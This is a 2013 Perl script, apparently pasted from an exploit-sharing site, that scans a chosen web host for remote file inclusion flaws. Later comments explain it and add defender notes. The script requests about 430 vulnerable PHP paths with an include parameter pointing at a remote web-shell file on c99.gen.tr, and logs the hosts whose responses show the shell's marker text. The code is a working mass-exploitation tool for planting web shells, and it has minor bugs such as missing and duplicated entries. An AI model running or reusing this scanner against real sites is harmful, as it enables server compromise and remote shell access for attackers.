Googleinurl

RFI Scanner Ver 1.0.0 Perl By The Black Devils By Asesino04

Sep 2nd, 2013
  1. #!/usr/bin/perl
  2. #1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  3. #0     _                   __           __       __                     1
  4. #1   /' \            __  /'__`\        /\ \__  /'__`\                   0
  5. #0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
  6. #1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
  7. #0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
  8. #1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
  9. #0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
  10. #1                  \ \____/ >> Exploit database separated by exploit   0
  11. #0                   \/___/          type (local, remote, DoS, etc.)    1
  12. #1                                                                      1
  13. #0  [+] Site            : 1337day.com                                   0
  14. #1  [+] Support e-mail  : submit[at]1337day.com                         1
  15. #0                                                                      0
  16. #1               #########################################              1
  17. #0               I'm The Black Devils member from Inj3ct0r Team         1
  18. #1               #########################################              0
  19. #0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  20.  
  21.     use HTTP::Request;
  22.     use LWP::UserAgent;
  23.  
  24. # Scan a host for Remote File Include vulnerabilities
  25. # by The Black Devils
  26. use HTTP::Request;
  27. use LWP::UserAgent;
  28.  
  # Console cosmetics only: each call passes a fixed string to the system
  # shell. `title`, `color` and `cls` are Windows cmd.exe built-ins, so the
  # script appears to have been written for a Windows console -- TODO confirm.
  # The return values of system() are not checked.
  29. system("title The Black Devils");
  30. system("color 1e");
  31. system ("cls");
  32.  
  # Print the banner, then read the scan target from standard input.
  33. print "    |=======================================================|\n";
  34. # print "    |= [!] Name : RFI Scanner Ver 1.0.0 Perl               =|\n";
  35. print "    |= [!] Author  : The Black Devils                      =|\n";
  36. print "    |= [!] Mail: mr.k4rizma(at)gmail(dot)com               =|\n";
  37. print "    |=======================================================|\n";
  38.  
  39. print "\n Insert host:(ex: http://www.site.com/)\n";
  # $host is a package global (no `my`; the script does not enable
  # `use strict`). Only the trailing newline is removed; the value is not
  # validated before it is concatenated into request URLs later on.
  40. $host=<STDIN>;
  41. chomp($host);
  42. print "Ok lets scan..\n";
  # Probe table: 430 assignments to package-global scalars named $rfi<N>.
  # Each value is a relative script path plus a query string that stops at
  # the "=" of one parameter. The request loop at the end of the script
  # looks these variables up by name, so the names must stay as they are.
  # Several paths appear more than once under different numbers.
  #
  # Defender view: the script's own header describes it as a Remote File
  # Include scanner, and the parameter names (basepath, root_dir,
  # phpbb_root_path, ...) suggest include-path variables in PHP applications
  # -- verify against the application in question. Requests for these paths
  # in which the listed parameter carries an absolute http:// URL are what
  # this scan looks like in a web-server access log. On the server side,
  # keeping PHP's allow_url_include set to Off and never passing request
  # parameters to include/require address the underlying flaw.
  43. $rfi1="includes/header.php?systempath=";
  44. $rfi2="Gallery/displayCategory.php?basepath=";
  45. $rfi3="index.inc.php?PATH_Includes=";
  46. $rfi4="nphp/nphpd.php?nphp_config[LangFile]=";
  47. $rfi5="include/db.php?GLOBALS[rootdp]=";
  48. $rfi6="ashnews.php?pathtoashnews=";
  49. $rfi7="ashheadlines.php?pathtoashnews=";
  50. $rfi8="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
  51. $rfi9="demo/includes/init.php?user_inc=";
  52. $rfi10="jaf/index.php?show=";
  53. $rfi11="inc/shows.inc.php?cutepath=";
  54. $rfi12="poll/admin/common.inc.php?base_path=";
  55. $rfi13="pollvote/pollvote.php?pollname=";
  56. $rfi14="sources/post.php?fil_config=";
  57. $rfi15="modules/My_eGallery/public/displayCategory.php?basepath=";
  58. $rfi16="bb_lib/checkdb.inc.php?libpach=";
  59. $rfi17="include/livre_include.php?no_connect=lol&chem_absolu=";
  60. $rfi18="index.php?from_market=Y&pageurl=";
  61. $rfi19="modules/mod_mainmenu.php?mosConfig_absolute_path=";
  62. $rfi20="pivot/modules/module_db.php?pivot_path=";
  63. $rfi21="modules/4nAlbum/public/displayCategory.php?basepath=";
  64. $rfi22="derniers_commentaires.php?rep=";
  65. $rfi23="modules/coppermine/themes/default/theme.php?THEME_DIR=";
  66. $rfi24="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
  67. $rfi25="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
  68. $rfi26="coppermine/themes/maze/theme.php?THEME_DIR=";
  69. $rfi28="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
  70. $rfi29="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=";
  71. $rfi30="myPHPCalendar/admin.php?cal_dir=";
  72. $rfi31="agendax/addevent.inc.php?agendax_path=";
  73. $rfi32="modules/mod_mainmenu.php?mosConfig_absolute_path=";
  74. $rfi33="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
  75. $rfi34="main.php?page=";
  76. $rfi35="default.php?page=";
  77. $rfi36="index.php?action=";
  78. $rfi37="index1.php?p=";
  79. $rfi38="index2.php?x=";
  80. $rfi39="index2.php?content=";
  81. $rfi40="index.php?conteudo=";
  82. $rfi41="index.php?cat=";
  83. $rfi42="include/new-visitor.inc.php?lvc_include_dir=";
  84. $rfi43="modules/agendax/addevent.inc.php?agendax_path=";
  85. $rfi44="shoutbox/expanded.php?conf=";
  86. $rfi45="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
  87. $rfi46="pivot/modules/module_db.php?pivot_path=";
  88. $rfi47="library/editor/editor.php?root=";
  89. $rfi48="library/lib.php?root=";
  90. $rfi49="e107/e107_handlers/secure_img_render.php?p=";
  91. $rfi50="zentrack/index.php?configFile=";
  92. $rfi51="main.php?x=";
  93. $rfi52="becommunity/community/index.php?pageurl=";
  94. $rfi53="GradeMap/index.php?page=";
  95. $rfi54="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
  96. $rfi55="calendar/calendar.php?serverPath=";
  97. $rfi56="calendar/functions/popup.php?serverPath=";
  98. $rfi57="calendar/events/header.inc.php?serverPath=";
  99. $rfi58="calendar/events/datePicker.php?serverPath=";
  100. $rfi59="calendar/setup/setupSQL.php?serverPath=";
  101. $rfi60="calendar/setup/header.inc.php?serverPath=";
  102. $rfi61="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=";
  103. $rfi62="zentrack/index.php?configFile=";
  104. $rfi63="pivot/modules/module_db.php?pivot_path=";
  105. $rfi64="inc/header.php/step_one.php?server_inc=";
  106. $rfi65="install/index.php?lng=../../include/main.inc&G_PATH=";
  107. $rfi66="inc/pipe.php?HCL_path=";
  108. $rfi67="include/write.php?dir=";
  109. $rfi68="include/new-visitor.inc.php?lvc_include_dir=";
  110. $rfi69="includes/header.php?systempath=";
  111. $rfi70="support/mailling/maillist/inc/initdb.php?absolute_path=";
  112. $rfi71="coppercop/theme.php?THEME_DIR=";
  113. $rfi72="zentrack/index.php?configFile=";
  114. $rfi73="pivot/modules/module_db.php?pivot_path=";
  115. $rfi74="inc/header.php/step_one.php?server_inc=";
  116. $rfi75="install/index.php?lng=../../include/main.inc&G_PATH=";
  117. $rfi76="inc/pipe.php?HCL_path=";
  118. $rfi77="include/write.php?dir=";
  119. $rfi78="include/new-visitor.inc.php?lvc_include_dir=";
  120. $rfi79="includes/header.php?systempath=";
  121. $rfi80="support/mailling/maillist/inc/initdb.php?absolute_path=";
  122. $rfi81="coppercop/theme.php?THEME_DIR=";
  123. $rfi82="becommunity/community/index.php?pageurl=";
  124. $rfi83="shoutbox/expanded.php?conf=";
  125. $rfi84="agendax/addevent.inc.php?agendax_path=";
  126. $rfi85="myPHPCalendar/admin.php?cal_dir=";
  127. $rfi86="yabbse/Sources/Packages.php?sourcedir=";
  128. $rfi87="dotproject/modules/projects/addedit.php?root_dir=";
  129. $rfi88="dotproject/modules/projects/view.php?root_dir=";
  130. $rfi89="dotproject/modules/projects/vw_files.php?root_dir=";
  131. $rfi90="dotproject/modules/tasks/addedit.php?root_dir=";
  132. $rfi91="dotproject/modules/tasks/viewgantt.php?root_dir=";
  133. $rfi92="My_eGallery/public/displayCategory.php?basepath=";
  134. $rfi93="modules/My_eGallery/public/displayCategory.php?basepath=";
  135. $rfi94="modules/4nAlbum/public/displayCategory.php?basepath=";
  136. $rfi95="modules/coppermine/themes/default/theme.php?THEME_DIR=";
  137. $rfi96="modules/agendax/addevent.inc.php?agendax_path=";
  138. $rfi97="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
  139. $rfi98="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
  140. $rfi99="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
  141. $rfi100="modules/mod_mainmenu.php?mosConfig_absolute_path=";
  142. $rfi101="shoutbox/expanded.php?conf=";
  143. $rfi102="pivot/modules/module_db.php?pivot_path=";
  144. $rfi103="library/editor/editor.php?root=";
  145. $rfi104="library/lib.php?root=";
  146. $rfi105="e107/e107_handlers/secure_img_render.php?p=";
  147. $rfi106="main.php?x=";
  148. $rfi107="main.php?page=";
  149. $rfi108="index.php?meio.php=";
  150. $rfi109="index.php?include=";
  151. $rfi110="index.php?inc=";
  152. $rfi111="index.php?page=";
  153. $rfi112="index.php?pag=";
  154. $rfi113="index.php?p=";
  155. $rfi114="index.php?x=";
  156. $rfi115="index.php?open=";
  157. $rfi116="index.php?visualizar=";
  158. $rfi117="index.php?pagina=";
  159. $rfi118="index2.php?content=";
  160. $rfi119="inc/step_one_tables.php?server_inc=";
  161. $rfi120="GradeMap/index.php?page=";
  162. $rfi121="phpshop/index.php?base_dir=";
  163. $rfi122="admin.php?cal_dir=";
  164. $rfi123="contacts.php?cal_dir=";
  165. $rfi124="convert-date.php?cal_dir=";
  166. $rfi125="album_portal.php?phpbb_root_path=";
  167. $rfi126="mainfile.php?MAIN_PATH=";
  168. $rfi127="dotproject/modules/files/index_table.php?root_dir=";
  169. $rfi128="html/affich.php?base=";
  170. $rfi129="gallery/init.php?HTTP_POST_VARS=";
  171. $rfi130="pm/lib.inc.php?pm_path=";
  172. $rfi131="ideabox/include.php?gorumDir=";
  173. $rfi132="index2.php?includes_dir=";
  174. $rfi133="forums/toplist.php?phpbb_root_path=";
  175. $rfi134="forum/toplist.php?phpbb_root_path=";
  176. $rfi135="admin/config_settings.tpl.php?include_path=";
  177. $rfi136="include/common.php?include_path=";
  178. $rfi137="event/index.php?page=";
  179. $rfi138="forum/index.php?includeFooter=";
  180. $rfi139="forums/index.php?includeFooter=";
  181. $rfi140="forum/bb_admin.php?includeFooter=";
  182. $rfi141="forums/bb_admin.php?includeFooter=";
  183. $rfi142="language/lang_english/lang_activity.php?phpbb_root_path=";
  184. $rfi143="forum/language/lang_english/lang_activity.php?phpbb_root_path=";
  185. $rfi144="blend_data/blend_common.php?phpbb_root_path=";
  186. $rfi145="master.php?root_path=";
  187. $rfi146="includes/kb_constants.php?module_root_path=";
  188. $rfi147="forum/includes/kb_constants.php?module_root_path=";
  189. $rfi148="forums/includes/kb_constants.php?module_root_path=";
  190. $rfi149="classes/adodbt/sql.php?classes_dir=";
  191. $rfi150="agenda.php3?rootagenda=";
  192. $rfi151="agenda2.php3?rootagenda=";
  193. $rfi152="sources/lostpw.php?CONFIG[path]=";
  194. $rfi153="topsites/sources/lostpw.php?CONFIG[path]=";
  195. $rfi154="toplist/sources/lostpw.php?CONFIG[path]=";
  196. $rfi155="sources/join.php?CONFIG[path]=";
  197. $rfi156="topsites/sources/join.php?CONFIG[path]=";
  198. $rfi157="toplist/sources/join.php?CONFIG[path]=";
  199. $rfi158="topsite/sources/join.php?CONFIG[path]=";
  200. $rfi159="public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=";
  201. $rfi160="extras/poll/poll.php?file_newsportal=";
  202. $rfi161="index.php?site_path=";
  203. $rfi162="mail/index.php?site_path=";
  204. $rfi163="fclick/show.php?path=";
  205. $rfi164="show.php?path=";
  206. $rfi165="calogic/reconfig.php?GLOBALS[CLPath]=";
  207. $rfi166="eshow.php?Config_rootdir=";
  208. $rfi167="auction/auction_common.php?phpbb_root_path=";
  209. $rfi168="index.php?inc_dir=";
  210. $rfi169="calendar/index.php?inc_dir=";
  211. $rfi170="modules/TotalCalendar/index.php?inc_dir=";
  212. $rfi171="modules/calendar/index.php?inc_dir=";
  213. $rfi172="calendar/embed/day.php?path=";
  214. $rfi173="ACalendar/embed/day.php?path=";
  215. $rfi174="calendar/add_event.php?inc_dir=";
  216. $rfi175="claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=";
  217. $rfi176="claroline/auth/ldap/authldap.php?includePath=";
  218. $rfi177="docebo/modules/credits/help.php?lang=";
  219. $rfi178="modules/credits/help.php?lang=";
  220. $rfi179="config.php?returnpath=";
  221. $rfi180="editsite.php?returnpath=";
  222. $rfi181="in.php?returnpath=";
  223. $rfi182="addsite.php?returnpath=";
  224. $rfi183="includes/pafiledb_constants.php?module_root_path=";
  225. $rfi184="phpBB/includes/pafiledb_constants.php?module_root_path=";
  226. $rfi185="pafiledb/includes/pafiledb_constants.php?module_root_path=";
  227. $rfi186="auth/auth.php?phpbb_root_path=";
  228. $rfi187="auth/auth_phpbb/phpbb_root_path=";
  229. $rfi188="apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=";
  230. $rfi189="apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=";
  231. $rfi190="infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=";
  232. $rfi191="phpdig/includes/config.php?relative_script_path=";
  233. $rfi192="includes/phpdig/includes/config.php?relative_script_path=";
  234. $rfi193="includes/dbal.php?eqdkp_root_path=";
  235. $rfi194="eqdkp/includes/dbal.php?eqdkp_root_path=";
  236. $rfi195="dkp/includes/dbal.php?eqdkp_root_path=";
  237. $rfi196="include/SQuery/gameSpy2.php?libpath=";
  238. $rfi197="include/global.php?GLOBALS[includeBit]=";
  239. $rfi198="topsites/config.php?returnpath=";
  240. $rfi199="manager/frontinc/prepend.php?_PX_config[manager_path]=";
  241. $rfi200="ubbthreads/addpost_newpoll.php?addpoll=thispath=";
  242. $rfi201="forum/addpost_newpoll.php?thispath=";
  243. $rfi202="forums/addpost_newpoll.php?thispath=";
  244. $rfi203="ubbthreads/ubbt.inc.php?thispath=";
  245. $rfi204="forums/ubbt.inc.php?thispath=";
  246. $rfi205="forum/ubbt.inc.php?thispath=";
  247. $rfi206="forum/admin/addentry.php?phpbb_root_path=";
  248. $rfi207="admin/addentry.php?phpbb_root_path=";
  249. $rfi208="index.php?f=";
  250. $rfi209="index.php?act=";
  251. $rfi210="ipchat.php?root_path=";
  252. $rfi211="includes/orderSuccess.inc.php?glob[rootDir]=";
  253. $rfi212="stats.php?dir[func]=dir[base]=";
  254. $rfi213="ladder/stats.php?dir[base]=";
  255. $rfi214="ladders/stats.php?dir[base]=";
  256. $rfi215="sphider/admin/configset.php?settings_dir=";
  257. $rfi216="admin/configset.php?settings_dir=";
  258. $rfi217="vwar/admin/admin.php?vwar_root=";
  259. $rfi218="modules/vwar/admin/admin.php?vwar_root=";
  260. $rfi219="modules/vWar_Account/includes/get_header.php?vwar_root=";
  261. $rfi220="modules/vWar_Account/includes/functions_common.php?vwar_root2=";
  262. $rfi221="sphider/admin/configset.php?settings_dir=";
  263. $rfi222="admin/configset.php?settings_dir=";
  264. $rfi223="impex/ImpExData.php?systempath=";
  265. $rfi224="forum/impex/ImpExData.php?systempath=";
  266. $rfi225="forums/impex/ImpExData.php?systempath=";
  267. $rfi226="application.php?base_path=";
  268. $rfi227="index.php?theme_path=";
  269. $rfi228="become_editor.php?theme_path=";
  270. $rfi229="add.php?theme_path=";
  271. $rfi230="bad_link.php?theme_path=";
  272. $rfi231="browse.php?theme_path=";
  273. $rfi232="detail.php?theme_path=";
  274. $rfi233="fav.php?theme_path=";
  275. $rfi234="get_rated.php?theme_path=";
  276. $rfi235="login.php?theme_path=";
  277. $rfi236="mailing_list.php?theme_path=";
  278. $rfi237="new.php?theme_path=";
  279. $rfi238="modify.php?theme_path=";
  280. $rfi239="pick.php?theme_path=";
  281. $rfi240="power_search.php?theme_path=";
  282. $rfi241="rating.php?theme_path=";
  283. $rfi242="register.php?theme_path=";
  284. $rfi243="review.php?theme_path=";
  285. $rfi244="rss.php?theme_path=";
  286. $rfi245="search.php?theme_path=";
  287. $rfi246="send_pwd.php?theme_path=";
  288. $rfi247="sendmail.php?theme_path=";
  289. $rfi248="tell_friend.php?theme_path=";
  290. $rfi249="top_rated.php?theme_path=";
  291. $rfi250="user_detail.php?theme_path=";
  292. $rfi251="user_search.php?theme_path=";
  293. $rfi252="invoice.php?base_path=";
  294. $rfi253="cgi-bin//classes/adodbt/sql.php?classes_dir=";
  295. $rfi254="cgi-bin/install/index.php?G_PATH=";
  296. $rfi255="cgi-bin/include/print_category.php?dir=";
  297. $rfi256="includes/class_template.php?quezza_root_path=";
  298. $rfi257="bazar/classified_right.php?language_dir=";
  299. $rfi258="classified_right.php?language_dir=";
  300. $rfi259="phpBazar/classified_right.php?language_dir=";
  301. $rfi260="chat/messagesL.php3?cmd=";
  302. $rfi261="phpMyChat/chat/messagesL.php3?cmd=";
  303. $rfi262="bbs/include/write.php?dir=";
  304. $rfi263="visitorupload.php?cmd=";
  305. $rfi264="modules/center/admin/accounts/process.php?module_path]=";
  306. $rfi265="index.php?template=";
  307. $rfi266="armygame.php?libpath=";
  308. $rfi267="lire.php?rub=";
  309. $rfi268="pathofhostadmin/?page=";
  310. $rfi269="apa_phpinclude.inc.php?apa_module_basedir=";
  311. $rfi270="index.php?req_path=";
  312. $rfi271="research/boards/encapsbb-0.3.2_fixed/index_header.php?root=";
  313. $rfi272="Farsi1/index.php?archive=";
  314. $rfi273="index.php?archive=";
  315. $rfi274="show_archives.php?template=";
  316. $rfi275="forum/include/common.php?pun_root=";
  317. $rfi276="pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=";
  318. $rfi277="vuln.php?=";
  319. $rfi278="cgi-bin//include/write.php?dir=";
  320. $rfi279="admin/common.inc.php?basepath=";
  321. $rfi280="pm/lib.inc.php?sfx=";
  322. $rfi281="pm/lib.inc.php?pm_path=";
  323. $rfi282="artmedic-kleinanzeigen-path/index.php?id=";
  324. $rfi283="osticket/include/main.php?include_dir=";
  325. $rfi284="include/main.php?config[search_disp]=include_dir=";
  326. $rfi285="phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=";
  327. $rfi286="quick_reply.php?phpbb_root_path=";
  328. $rfi287="zboard/include/write.php?dir=";
  329. $rfi288="admin/plog-admin-functions.php?configbasedir=";
  330. $rfi289="content.php?content=";
  331. $rfi290="q-news.php?id=";
  332. $rfi291="_conf/core/common-tpl-vars.php?confdir=";
  333. $rfi292="votebox.php?VoteBoxPath=";
  334. $rfi293="al_initialize.php?alpath=";
  335. $rfi294="include/db.php?GLOBALS[rootdp]=";
  336. $rfi295="modules/news/archivednews.php?GLOBALS[language_home]=";
  337. $rfi296="protection.php?siteurl=";
  338. $rfi297="modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=";
  339. $rfi298="index2.php?includes_dir=";
  340. $rfi299="classes.php?LOCAL_PATH=";
  341. $rfi300="extensions/moblog/moblog_lib.php?basedir=";
  342. $rfi301="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
  343. $rfi302="phpWebLog/include/init.inc.php?G_PATH=";
  344. $rfi303="admin/objects.inc.php4?Server=";
  345. $rfi304="trg_news30/trgnews/install/article.php?dir=";
  346. $rfi305="block.php?Include=";
  347. $rfi306="arpuivo.php?data=";
  348. $rfi307="setup/index.php?GALLERY_BASEDIR=";
  349. $rfi308="include/help.php?base=";
  350. $rfi309="index.php?[Home]=";
  351. $rfi310="block.php?Include=";
  352. $rfi311="examples/phonebook.php?page=";
  353. $rfi312="PHPNews/auth.php?path=";
  354. $rfi313="include/print_category.php?dir=";
  355. $rfi314="skin/zero_vote/login.php?dir=";
  356. $rfi315="skin/zero_vote/setup.php?dir=";
  357. $rfi316="skin/zero_vote/ask_password.php?dir=";
  358. $rfi317="gui/include/sql.php?include_path=";
  359. $rfi318="webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=";
  360. $rfi319="email.php?login=cer_skin=";
  361. $rfi320="PhotoGal/ops/gals.php?news_file=";
  362. $rfi321="index.php?custom=";
  363. $rfi322="loginout.php?cutepath=";
  364. $rfi323="oneadmin/config.php?path[docroot]=";
  365. $rfi324="xcomic/initialize.php?xcomicRootPath=";
  366. $rfi325="skin/zero_vote/setup.php?dir=";
  367. $rfi326="skin/zero_vote/error.php? dir=";
  368. $rfi327="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
  369. $rfi328="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
  370. $rfi329="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
  371. $rfi330="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
  372. $rfi331="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
  373. $rfi332="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
  374. $rfi333="src/index_overview.inc.php?config[path_src_include]=";
  375. $rfi334="src/index_leftnavbar.inc.php?config[path_src_include]=";
  376. $rfi335="src/index_image.inc.php?config[path_src_include]=";
  377. $rfi336="src/image-gd.class.php?config[path_src_include]=";
  378. $rfi337="src/image.class.php?config[path_src_include]=";
  379. $rfi338="src/album.class.php?config[path_src_include]=";
  380. $rfi339="src/show_random.inc.php?config[path_src_include]=";
  381. $rfi340="src/main.inc.php?config[path_src_include]=";
  382. $rfi341="src/index_passwd-admin.inc.php?config[path_admin_include]=";
  383. $rfi342="yappa-ng/src/index_overview.inc.php?config[path_src_include]=";
  384. $rfi343="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
  385. $rfi344="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
  386. $rfi345="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
  387. $rfi346="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
  388. $rfi347="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
  389. $rfi348="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
  390. $rfi349="src/index_overview.inc.php?config[path_src_include]=";
  391. $rfi350="src/image-gd.class.php?config[path_src_include]=";
  392. $rfi351="src/image.class.php?config[image_module]=";
  393. $rfi352="src/album.class.php?config[path_src_include]=";
  394. $rfi353="src/show_random.inc.php?config[path_src_include]=";
  395. $rfi353="src/main.inc.php?config[path_src_include]=";
  396. $rfi354="includes/db_adodb.php?baseDir=";
  397. $rfi355="includes/db_connect.php?baseDir=";
  398. $rfi356="includes/session.php?baseDir=";
  399. $rfi357="modules/projects/gantt.php?dPconfig[root_dir]=";
  400. $rfi358="modules/projects/gantt2.php?dPconfig[root_dir]=";
  401. $rfi359="modules/projects/vw_files.php?dPconfig[root_dir]=";
  402. $rfi360="modules/admin/vw_usr_roles.php?baseDir=";
  403. $rfi361="modules/public/calendar.php?baseDir=";
  404. $rfi362="modules/public/date_format.php?baseDir=";
  405. $rfi363="modules/tasks/gantt.php?baseDir=";
  406. $rfi364="mantis/login_page.php?g_meta_include_file=";
  407. $rfi365="phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=";
  408. $rfi366="modules/My_eGallery/public/displayCategory.php?basepath=";
  409. $rfi367="dotproject/modules/files/index_table.php?root_dir=";
  410. $rfi368="nukebrowser.php?filnavn=";
  411. $rfi369="bug_sponsorship_list_view_inc.php?t_core_path=";
  412. $rfi370="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
  413. $rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";
  414. $rfi372="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
  415. $rfi373="includes/calendar.php?phpc_root_path=";
  416. $rfi374="includes/setup.php?phpc_root_path=";
  417. $rfi375="phpBB/admin/admin_styles.php?mode=";
  418. $rfi376="aMember/plugins/db/mysql/mysql.inc.php?config=";
  419. $rfi377="admin/lang.php?CMS_ADMIN_PAGE=";
  420. $rfi378="inc/pipe.php?HCL_path=";
  421. $rfi379="include/write.php?dir=";
  422. $rfi380="becommunity/community/index.php?pageurl=";
  423. $rfi381="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
  424. $rfi382="modules/mod_mainmenu.php?mosConfig_absolute_path=";
  425. $rfi383="modules/agendax/addevent.inc.php?agendax_path=";
  426. $rfi384="shoutbox/expanded.php?conf=";
  427. $rfi385="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
  428. $rfi386="index.php?page=";
  429. $rfi387="index.php?pag=";
  430. $rfi388="index.php?include=";
  431. $rfi389="index.php?content=";
  432. $rfi390="index.php?cont=";
  433. $rfi391="index.php?c=";
  434. $rfi392="modules/My_eGallery/index.php?basepath=";
  435. $rfi393="modules/newbb_plus/class/forumpollrenderer.php?bbPath=";
  436. $rfi394="journal.php?m=";
  437. $rfi395="index.php?m=";
  438. $rfi396="links.php?c=";
  439. $rfi397="forums.php?m=";
  440. $rfi398="list.php?c=";
  441. $rfi399="user.php?xoops_redirect=";
  442. $rfi400="index.php?id=";
  443. $rfi401="r.php?url=";
  444. $rfi402="CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=";
  445. $rfi403="inc/formmail.inc.php?script_root=";
  446. $rfi404="include/init.inc.php?G_PATH=";
  447. $rfi405="backend/addons/links/index.php?PATH=";
  448. $rfi406="modules/newbb_plus/class/class.forumposts.php?bbPath[path]=";
  449. $rfi407="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
  450. $rfi408="protection.php?siteurl=";
  451. $rfi409="htmltonuke.php?filnavn=";
  452. $rfi410="mail_autocheck.php?pm_path=";
  453. $rfi411="index.php?p=";
  454. $rfi412="modules/4nAlbum/public/displayCategory.php?basepath=";
  455. $rfi413="e107/e107_handlers/secure_img_render.php?p=";
  456. $rfi414="include/new-visitor.inc.php?lvc_include_dir=";
  457. $rfi415="community/modules/agendax/addevent.inc.php?agendax_path=";
  458. $rfi416="library/editor/editor.php?root=";
  459. $rfi417="library/lib.php?root=";
  460. $rfi418="zentrack/index.php?configFile=";
  461. $rfi419="pivot/modules/module_db.php?pivot_path=";
  462. $rfi420="myPHPCalendar/admin.php?cal_dir=";
  463. $rfi421="index.php/main.php?x=";
  464. $rfi422="os/pointer.php?url=";
  465. $rfi423="p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=";
  466. $rfi424="db.php?path_local=";
  467. $rfi425="phpGedView/individual.php?PGV_BASE_DIRECTORY=";
  468. $rfi426="index.php?kietu[url_hit]=";
  469. $rfi427="phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=";
  470. $rfi428="Sources/Packages.php?sourcedir=";
  471. $rfi429="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
  472. $rfi430="cgi-bin//gadgets/Blog/BlogModel.php?path=";
  473.  
  # Request loop: for each index, build one URL from $host and the matching
  # $rfi<N> value, fetch it, and record the URL when the response body
  # contains two marker strings.
  #
  # Defender view: in an access log this appears as a burst of GET requests
  # from one client, each for one of the paths assigned earlier in the script,
  # with the named parameter set to an absolute http:// URL on a third-party
  # host (here c99.gen.tr/c99.txt) followed by "??". No ->agent() call is
  # made, so LWP's default User-Agent (libwww-perl/<version>) is sent.
  # The condition being probed is a request parameter reaching a PHP
  # include/require; allow_url_include=Off and an allowlist of include
  # targets remove it.
  #
  # @values is not assigned anywhere in the visible script, and the
  # for-initialiser on the next line overwrites $int.
  474. $int = $values[ rand(4) ];
  # $int takes the values 1 through 429.
  475. for($int=1;$int<430;$int++){
  # Remote URL placed in the probed parameter; stored as a one-element array
  # and interpolated into the double-quoted string three lines below.
  476. @shelllink="http://c99.gen.tr/c99.txt?";
  # Build the variable name "rfi<N>" as a string.
  477. $lol="rfi";
  478. $asd=$lol.$int;
  # $$asd is a symbolic reference: it reads the package variable whose name
  # is held in $asd. This only works because `use strict` is not enabled.
  479. $url2="http://".$host."/".$$asd."@shelllink?";
  # One GET per candidate; a new user agent is created on every iteration,
  # with a 10-second timeout.
  480. my $req=HTTP::Request->new(GET=>$url2);
  481. my $ua=LWP::UserAgent->new();
  482. $ua->timeout(10);
  483. my $response=$ua->request($req);
  # A hit requires a successful HTTP status and a body matching both
  # /r57shell/ and /by/ -- presumably text from the remote file showing up in
  # the target's output; confirm against the remote file.
  484. if ($response->is_success) {
  485. if( $response->content =~ /r57shell/ && $response->content =~ /by/ ){
  # Append the URL to file.txt in the current directory. Two-argument open
  # with a bareword handle; the return value of open is not checked.
  486. open(FILE,">>file.txt");
  487. print FILE "$url2\n";
  488. close(FILE);
  489. print "$url2 is vulnerable..\n";
  490. }}
  491. }